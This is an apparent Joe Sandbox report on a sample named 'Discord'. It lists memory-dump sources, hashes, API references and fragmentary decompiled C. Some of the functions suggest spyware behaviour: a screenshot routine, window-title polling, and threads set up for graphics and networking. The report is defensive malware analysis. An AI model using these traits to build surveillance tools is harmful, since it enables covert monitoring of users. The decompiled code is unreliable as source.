Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: __deregister_frame_info$libgcc_s_dw2-1.dll
API String ID: 4061214504-2468945734
Opcode ID: 3dddefbe034b1c7c407848d76d609fd8bb1a3a16a9c93dbc9b7e33bd0e7ddb86
Instruction ID: 34d339e72f204836826e6287e40ae81886b5c634bee83c27f85ec5ad47181d0d
Opcode Fuzzy Hash: 3dddefbe034b1c7c407848d76d609fd8bb1a3a16a9c93dbc9b7e33bd0e7ddb86
Instruction Fuzzy Hash: D0F0ACB09086014BD7007F7DAA4911B7AF4AA81305F05C53DD986FB3A5EB79E818CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 6DE85D50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E6DE85D50() {
				void* _v24;
				char** _v28;

				L6DE8DC80();
				if(strstr( *0x6de9e830, "serche") == 0) {
					L3:
					return 0;
				} else {
					_v28 = 0x6de9e830;
					L6DE8DD88();
					_v28 = "serche";
					 *((intOrPtr*)( &_v28 - 4)) =  *0x6de9e834;
					if(strstr(??, ??) == 0) {
						goto L3;
					} else {
						 *0x6de9e730 =  *0x6de9e734;
						return 1;
					}
				}
			}

0x6de85d53
0x6de85d6f
0x6de85db1
0x6de85db6
0x6de85d71
0x6de85d76
0x6de85d7d
0x6de85d8a
0x6de85d92
0x6de85d9c
0x00000000
0x6de85d9e
0x6de85da3
0x6de85db0
0x6de85db0
0x6de85d9c

APIs

_Z12ImprimeEcranv.DFO1 ref: 6DE85D53
strstr.MSVCRT ref: 6DE85D68
_ZNSs6assignERKSs.LIBSTDC++-6 ref: 6DE85D7D
strstr.MSVCRT ref: 6DE85D95

Strings

4m, xrefs: 6DE85D71

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: strstr$EcranvImprimeSs6assign
String ID: 4m
API String ID: 2362133869-2968525894
Opcode ID: 44e3802a0b59f55300c67baf4692da2cb0b659d4a859c441907e226737538d6e
Instruction ID: 2f5f23fecfa8c9088e9ed25f9bad1b8040c3fa7d9c0877943447502182effa34
Opcode Fuzzy Hash: 44e3802a0b59f55300c67baf4692da2cb0b659d4a859c441907e226737538d6e
Instruction Fuzzy Hash: C5F0FE74917A008BDF10EFA8854622A36E0BB41744F95182DDD99CF355EF398810C753

Uniqueness

Uniqueness Score: -1.00%

Function 6DE81510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6DE8151D
GetProcAddress.KERNEL32 ref: 6DE8153A
FreeLibrary.KERNEL32 ref: 6DE8155E

Strings

libgcc_s_dw2-1.dll, xrefs: 6DE81516
__deregister_frame_info, xrefs: 6DE8152F

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: __deregister_frame_info$libgcc_s_dw2-1.dll
API String ID: 4061214504-2468945734
Opcode ID: 323adc594774d8cf487e92a4d585da47457e53d4eaf1f2f33041743e35585403
Instruction ID: 4698d73446f95de0b3c751eb39db1d1468521ad26d37a5fabacdca61eaea900c
Opcode Fuzzy Hash: 323adc594774d8cf487e92a4d585da47457e53d4eaf1f2f33041743e35585403
Instruction Fuzzy Hash: FCF01CB05046028BDB007FBD855A62E7EF0AF52604F21442CD89AEE215EF35D459C783

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8E4C0 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 6DE8E4F8
GetCurrentProcessId.KERNEL32 ref: 6DE8E509
GetCurrentThreadId.KERNEL32 ref: 6DE8E511
GetTickCount.KERNEL32 ref: 6DE8E51A
QueryPerformanceCounter.KERNEL32 ref: 6DE8E529

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 29b77d18d34b7724de9a953ef8349a34bdeca5807953e73f3022d630a194841a
Instruction ID: 107cb6e00354b6b862a7e28777a0471ba14e0f2f9114e3a2b10d854de4dae40b
Opcode Fuzzy Hash: 29b77d18d34b7724de9a953ef8349a34bdeca5807953e73f3022d630a194841a
Instruction Fuzzy Hash: AE115B76D002298BCF20AFB9E5482CEFBF4FB0D614F455426E808FB300EB3568488B91

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83B9F Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DE83B9F() {
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t27;
				void* _t34;
				intOrPtr* _t35;

				_t27 = _t17;
				_t19 = _t34 - 0xcc;
				 *_t35 = _t19;
				 *((intOrPtr*)(_t34 - 0xf0)) = _t19;
				L6DE8DD48();
				_push(_t19);
				_t21 =  *((intOrPtr*)(_t34 - 0xf0));
				 *_t35 = _t21;
				L6DE8DD48();
				_push(_t21);
				_t23 =  *((intOrPtr*)(_t34 - 0xf0));
				while(1) {
					 *_t35 = _t23;
					L6DE8DD48();
					_push(_t23);
					 *_t35 = _t27;
					L6DE8EBA0();
					_t27 = _t23;
					 *_t35 =  *((intOrPtr*)(_t34 - 0xf0));
					L6DE8DD48();
					_t23 = _t34 - 0xe3;
				}
			}

0x6de83b9f
0x6de83baa
0x6de83bb0
0x6de83bb3
0x6de83bb9
0x6de83bbe
0x6de83b6c
0x6de83b72
0x6de83b75
0x6de83b7a
0x6de83b84
0x6de83ab7
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ad9
0x6de83adc
0x6de83ab1
0x6de83ab1

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE83B75
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE83BB9

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: fb2232ed121b2b03a09bcdf152ceff556b151ebb235474374d7c4c6b1fe09553
Instruction ID: d0b10343b63599858f8e11b78ba7b66a3d6d4b469b6c4fa27b976932fdc995b2
Opcode Fuzzy Hash: fb2232ed121b2b03a09bcdf152ceff556b151ebb235474374d7c4c6b1fe09553
Instruction Fuzzy Hash: 7E01C27494561A8FCB20DB28C888F9CF3F4BF58218F1185D9D44DE7242EB30AA898F01

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8B839 Relevance: 7.5, APIs: 5, Instructions: 34sleepCOMMON

Download Yara Rule

APIs

_ZdlPv.LIBSTDC++-6 ref: 6DE8B848
GetWindowTextLengthA.USER32 ref: 6DE8B85F
_Znaj.LIBSTDC++-6 ref: 6DE8B873
GetWindowTextA.USER32 ref: 6DE8B896
Sleep.KERNEL32 ref: 6DE8B8A6

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: TextWindow$LengthSleepZnaj
String ID:
API String ID: 279909675-0
Opcode ID: 6a68fad147485529948bb12cfcaebc2c3b24983d3e3fbb25f28caa507ae3fc75
Instruction ID: 57892316d0cbf2a615003e68c640f1575c11a1ab4dcd88870eacf0f17228f7f7
Opcode Fuzzy Hash: 6a68fad147485529948bb12cfcaebc2c3b24983d3e3fbb25f28caa507ae3fc75
Instruction Fuzzy Hash: 340119B5806B05EFDB00AFB8D188359BBF1FB45714F06492ED688DB250E774A055CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8CB74 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6DE8CB74() {
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t28;
				intOrPtr* _t29;

				_t22 = _t13;
				 *_t29 = _t28 - 0x83;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t28 - 0x74)) - 0xc);
				 *_t29 = _t28 - 0x84;
				L6DE8DD48();
				_t19 = _t28 - 0x85;
				 *_t29 = _t19;
				L6DE8DD48();
				_push(_t19);
				while(1) {
					_t21 = _t28 - 0x86;
					 *_t29 = _t21;
					L6DE8DD48();
					_push(_t21);
					 *_t29 = _t22;
					L6DE8EBA0();
					_t22 = _t21;
				}
			}

0x6de8cb74
0x6de8cb4d
0x6de8cb50
0x6de8cb55
0x6de8cb62
0x6de8cb65
0x6de8caad
0x6de8cab3
0x6de8cab6
0x6de8cabb
0x6de8cabc
0x6de8cac2
0x6de8cac8
0x6de8cacb
0x6de8cad0
0x6de8cad1
0x6de8cad4
0x6de8cad9
0x6de8cad9

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000), ref: 6DE8CAB6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000), ref: 6DE8CACB
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,?,?,?,00000000), ref: 6DE8CAD4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000), ref: 6DE8CB50
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000), ref: 6DE8CB65

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: ad20415bec5b2313201727a49b1437d154ab04772069ec87103e02210b81650e
Instruction ID: cfa0b143816390700a5b3439fea600ded8d73853cd1cd1f3dc8bff8b6302a9cd
Opcode Fuzzy Hash: ad20415bec5b2313201727a49b1437d154ab04772069ec87103e02210b81650e
Instruction Fuzzy Hash: CDF0197494890A8FCB10DF64C48899CF7F8BF5431CF21899D9199E7242EF309649CF01

Uniqueness

Uniqueness Score: -1.00%

Function 6DE885D0 Relevance: 7.5, APIs: 5, Instructions: 30
sleepCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E6DE885D0() {
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _t9;
				void* _t10;
				void* _t11;
				intOrPtr* _t17;
				intOrPtr* _t18;
				intOrPtr* _t19;
				intOrPtr* _t20;
				void* _t21;

				_v40 = 0x6de9e798;
				_v44 = 0x6de9e7a0;
				_v48 = 0x6de9e900;
				_v52 = 0x6de9ea90;
				_v56 = 0x6de9ea94;
				 *_t17 = 0x6de9e4c0;
				L6DE8DCB8();
				 *_t17 = 0x6de8dd08;
				_t10 = E6DE94EB0(_t9,  &_v24, _t21);
				_t18 = _t17 - 4;
				 *_t18 = E6DE8D7E0;
				_t11 = E6DE94DF0(_t10,  &_v20, _t21);
				_t19 = _t18 - 4;
				 *_t19 = 0x6de8dd10;
				E6DE94EB0(_t11,  &_v16, _t21);
				_t20 = _t19 - 4;
				L1:
				 *_t20 = 0x4e20;
				Sleep(??);
				_t20 = _t20 - 4;
				goto L1;
			}

0x6de885d7
0x6de885df
0x6de885e7
0x6de885ef
0x6de885f7
0x6de885ff
0x6de88606
0x6de8860e
0x6de88615
0x6de8861d
0x6de88620
0x6de88627
0x6de8862c
0x6de88632
0x6de88639
0x6de88644
0x6de88650
0x6de88650
0x6de88657
0x6de88659
0x00000000

APIs

_Z5ielleR12_devicemodeARN7Gdiplus19GdiplusStartupInputERmR7WSADataRdS7_.DFO1 ref: 6DE88606
_ZNSt6threadC1IRFvvEIEEEOT_DpOT0_.DPUB1 ref: 6DE88615

Part of subcall function 6DE94EB0: _Znwj.LIBSTDC++-6 ref: 6DE94EC7
Part of subcall function 6DE94EB0: _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE14_M_get_deleterERKSt9type_info.DPUB1 ref: 6DE94F06
Part of subcall function 6DE94EB0: _ZNSt6thread15_M_start_threadESt10shared_ptrINS_10_Impl_baseEE.LIBSTDC++-6 ref: 6DE94F1C

_ZNSt6threadC1IRFivEIEEEOT_DpOT0_.DPUB1 ref: 6DE88627

Part of subcall function 6DE94DF0: _Znwj.LIBSTDC++-6(?,?,?,?,?,?,?,6DE8862C), ref: 6DE94E07
Part of subcall function 6DE94DF0: _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE14_M_get_deleterERKSt9type_info.DPUB1(?,?,?,?,?,?,?,6DE8862C), ref: 6DE94E46
Part of subcall function 6DE94DF0: _ZNSt6thread15_M_start_threadESt10shared_ptrINS_10_Impl_baseEE.LIBSTDC++-6(?,?,?,?,?,?,?,?,6DE8862C), ref: 6DE94E5C

_ZNSt6threadC1IRFvvEIEEEOT_DpOT0_.DPUB1 ref: 6DE88639
Sleep.KERNEL32 ref: 6DE88657

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: St6thread$Bind_simpleE14_ImplImpl_baseLock_policyM_get_deleterM_start_threadN9__gnu_cxx12_S_10_Sp_counted_ptr_inplaceSt10shared_ptrSt12_St23_St6thread15_St6thread5_St9type_infoZnwj$DataGdiplusGdiplus19InputR12_devicemodeSleepStartupZ5ielle
String ID:
API String ID: 1609553955-0
Opcode ID: 8f99cc6be857ff519a8bae44bdac27a7473b81fff8ae0abdc31c89fc2293d448
Instruction ID: 51007c053c491807f0a6657b9ede6dfca0cbf1a8bf6684e33db08d1c5fc82900
Opcode Fuzzy Hash: 8f99cc6be857ff519a8bae44bdac27a7473b81fff8ae0abdc31c89fc2293d448
Instruction Fuzzy Hash: 87F069F480A6059FC600FFA5D14B26EBBB4BF81604F614D1DDA955B240DF30A508CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8A029 Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE8A029() {
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t20;
				intOrPtr _t25;
				void* _t26;
				intOrPtr* _t27;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr* _t30;

				_t20 = _t12;
				 *_t27 =  *((intOrPtr*)(_t26 - 0x3c));
				L6DE8DD48();
				_t28 = _t27 - 4;
				while(1) {
					_t16 = _t26 - 0x37;
					 *_t28 = _t16;
					L6DE8DD48();
					_t29 = _t28 - 4;
					 *_t29 = _t20;
					L6DE8EBA0();
					_t20 = _t16;
					 *_t29 =  *((intOrPtr*)(_t26 - 0x3c));
					L6DE8DD48();
					_t30 = _t29 - 4;
					 *_t30 = _t25;
					L6DE8DD48();
					_t28 = _t30 - 4;
				}
			}

0x6de8a029
0x6de8a017
0x6de8a01a
0x6de8a01f
0x6de89f8a
0x6de89f90
0x6de89f93
0x6de89f96
0x6de89f9b
0x6de89f9e
0x6de89fa1
0x6de89fa6
0x6de89fb1
0x6de89fb4
0x6de89fb9
0x6de89f7c
0x6de89f82
0x6de89f87
0x6de89f87

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F82
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F96
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE89FA1
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89FB4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8A01A

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: d40737f1717669dfdebdca37818e5b7bcde5d2a986c1d63924a7b33250e47b8d
Instruction ID: e0f6190eca29e88d0253498a1607ba788680187c8d49969c790ba91788a724ef
Opcode Fuzzy Hash: d40737f1717669dfdebdca37818e5b7bcde5d2a986c1d63924a7b33250e47b8d
Instruction Fuzzy Hash: F9F0EC78D095098FCF05EFB8D19849CF7F1EF49218F11852AE956AB251EB30A949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83AFA Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6DE83AFA() {
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t26;
				intOrPtr* _t27;

				_t20 = _t13;
				 *_t27 =  *((intOrPtr*)(_t26 - 0xf0));
				L6DE8DD48();
				 *__esp =  *((intOrPtr*)(__ebp - 0xf0));
				L6DE8DD48();
				_push( *((intOrPtr*)(__ebp - 0xc4)) - 0xc);
				while(1) {
					 *_t27 =  *((intOrPtr*)(_t26 - 0xf0));
					L6DE8DD48();
					_t17 = _t26 - 0xe3;
					 *_t27 = _t17;
					L6DE8DD48();
					_push(_t17);
					 *_t27 = _t20;
					L6DE8EBA0();
					_t20 = _t17;
				}
			}

0x6de83afa
0x6de83b0b
0x6de83b0e
0x6de83b23
0x6de83b26
0x6de83b2b
0x6de83aca
0x6de83ad9
0x6de83adc
0x6de83ab1
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ac8

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE83B0E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE83B26

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 27ff8cbe5e0fd13331df6323de216b7c52d62292ad265f7291bdf67d02117da6
Instruction ID: 957a6d7bb0c289bd0bacc3bf5889994ce0a6960f40918448e4c0a8ba5a020f0d
Opcode Fuzzy Hash: 27ff8cbe5e0fd13331df6323de216b7c52d62292ad265f7291bdf67d02117da6
Instruction Fuzzy Hash: 92F0B67495961A8FCB10DF28C898BACF7F4FF58214F1189D99549A7242EA30AA858F41

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83B40 Relevance: 7.5, APIs: 5, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6DE83B40() {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t25;
				void* _t26;
				intOrPtr* _t27;

				_t18 = _t11;
				 *_t27 = _t25;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t26 - 0xd4)));
				 *_t27 = _t25;
				L6DE8DD48();
				while(1) {
					_t15 = _t26 - 0xe3;
					 *_t27 = _t15;
					L6DE8DD48();
					_push(_t15);
					 *_t27 = _t18;
					L6DE8EBA0();
					_t18 = _t15;
					 *_t27 =  *((intOrPtr*)(_t26 - 0xf0));
					L6DE8DD48();
				}
			}

0x6de83b40
0x6de83a8a
0x6de83a90
0x6de83a95
0x6de83a9c
0x6de83aa2
0x6de83aa8
0x6de83ab1
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ad9
0x6de83adc
0x6de83ae1

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000), ref: 6DE83A90
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000), ref: 6DE83AA2
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
